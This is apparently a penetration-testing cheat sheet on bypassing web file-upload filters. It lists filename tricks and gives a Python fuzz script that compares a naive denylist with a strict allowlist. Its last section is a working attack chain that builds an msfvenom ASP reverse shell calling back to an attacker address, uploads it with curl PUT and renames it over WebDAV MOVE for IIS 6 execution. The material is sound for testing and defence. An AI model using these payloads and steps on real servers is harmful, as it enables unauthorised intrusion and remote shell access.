Bypassing File Upload Restrictions
Common techniques for bypassing file upload restrictions on web sites. Most of them exploit a gap between what the upload filter checks and what the web server or file system actually does with the filename.
- Change the Content-Type of the file part in the multipart request (e.g. to image/jpeg) using Burp, ZAP etc.; many filters only check this client-supplied header.
- Use alternative server-executable extensions the filter forgets, e.g. file.php5, file.phtml, file.shtml, file.asa, file.cer (extensions that older IIS or Apache configurations still hand to an interpreter).
- Change letter case, e.g. file.aSp or file.PHp3, against filters that compare case-sensitively while the server maps extensions case-insensitively.
- Add trailing spaces and/or dots to the filename, e.g. "file.asp ", "file.asp." or "file.asp. . .. .."; Windows strips trailing dots and spaces when creating the file, so the stored name becomes file.asp.
- Put a semicolon after the forbidden extension and before a permitted one, e.g. file.asp;.jpg: IIS 6 and earlier stop parsing the name at the semicolon and execute it as ASP.
- Upload a file with two extensions, e.g. file.php.jpg (works where the server maps handlers on any extension in the name, as Apache does with AddHandler, or where the filter only inspects the last one).
- Insert a null byte, e.g. file.asp%00.jpg: the filter sees .jpg, but C-string based file handling (older PHP versions, for example) truncates at the null and writes file.asp.
- Use NTFS alternate data stream syntax, e.g. file.asp::$DATA (the file's own unnamed data stream, so the content lands in file.asp) or file.asp:.jpg (the content goes into a stream named .jpg, but file.asp is still created on disk); the name passes the check while the file system treats it as file.asp.
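The list above is most useful as a fuzz list. The following script is an added example, not code from the original page: it generates the candidate filenames for each trick and runs them against two filter implementations, a naive denylist of the kind these tricks defeat and a strict allowlist that rejects all of them. The base name, the alternative-extension map and both filters are illustrative assumptions.

```python
"""Generate upload-filter bypass candidates and test them against two filters.

Added example, not code from the original page. The ALT_EXTENSIONS map, the
base name and both filter functions are illustrative assumptions.
"""
import re
from itertools import product

# Assumed map (not from the page): extensions an interpreter may still execute
# when the obvious one is blocked.
ALT_EXTENSIONS = {
    "php": ["php3", "php4", "php5", "phtml", "phar"],
    "asp": ["asa", "cer", "cdx", "asax"],
}


def case_variants(ext):
    """All upper/lower spellings of an extension: asp -> ASP, ASp, ..., asp."""
    return sorted({"".join(p) for p in product(*[(c.lower(), c.upper()) for c in ext])})


def bypass_candidates(base, blocked, allowed):
    """Ordered, de-duplicated filenames to try for a blocked extension."""
    cands = []

    def add(name):
        if name not in cands:
            cands.append(name)

    for alt in ALT_EXTENSIONS.get(blocked, []):      # alternative executable extensions
        add(f"{base}.{alt}")
    for v in case_variants(blocked):                  # case variation
        add(f"{base}.{v}")
    for suffix in [".", " ", " .", ". . .. .."]:      # trailing dots/spaces (Windows strips them)
        add(f"{base}.{blocked}{suffix}")
    add(f"{base}.{blocked};.{allowed}")               # IIS 6 semicolon truncation
    add(f"{base}.{blocked}.{allowed}")                # double extension, both orders
    add(f"{base}.{allowed}.{blocked}")
    add(f"{base}.{blocked}%00.{allowed}")             # null byte, URL-encoded and raw
    add(f"{base}.{blocked}\x00.{allowed}")
    add(f"{base}.{blocked}::$DATA")                   # NTFS alternate data streams
    add(f"{base}.{blocked}:.{allowed}")
    return cands


def naive_denylist_allows(filename, blocked=("asp", "php")):
    """A typical broken check: only the text after the last dot is inspected."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in blocked


def strict_allowlist_allows(filename, allowed=("jpg", "png")):
    """Hardened check: one dot, safe characters only, extension from an allowlist.
    In practice, also store the file under a server-generated name."""
    pattern = r"[A-Za-z0-9_-]+\.(" + "|".join(map(re.escape, allowed)) + r")"
    return re.fullmatch(pattern, filename) is not None


if __name__ == "__main__":
    for name in bypass_candidates("shell", "asp", "jpg"):
        print(f"{name!r:32} naive={naive_denylist_allows(name)!s:5} "
              f"strict={strict_allowlist_allows(name)}")
```

Running it shows which candidates a last-dot denylist lets through (the semicolon, double-extension, trailing-dot and ::$DATA variants all pass) while none survive the allowlist; the allowlist is the check to recommend in a report, together with server-side renaming.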
When both the MOVE and PUT HTTP methods are available (WebDAV)
Create the payload and rename it to .txt, an extension the server accepts:

```shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.187 LPORT=443 -f asp > shell443.asp
mv shell443.asp shell443.txt
```

Upload the file with curl and the PUT method:

```shell
curl -T shell443.txt http://10.11.1.229/ -v
```

From ZAP or Burp, rename/move the file to shell443.asp;.jpg, where jpg is an allowed extension (IIS 6 stops at the semicolon and still executes it as ASP):

```http
MOVE http://10.11.1.229/shell443.txt HTTP/1.1
Accept: */*
Destination: /shell443.asp;.jpg
Overwrite: F
Content-Length: 0
Host: 10.11.1.229
```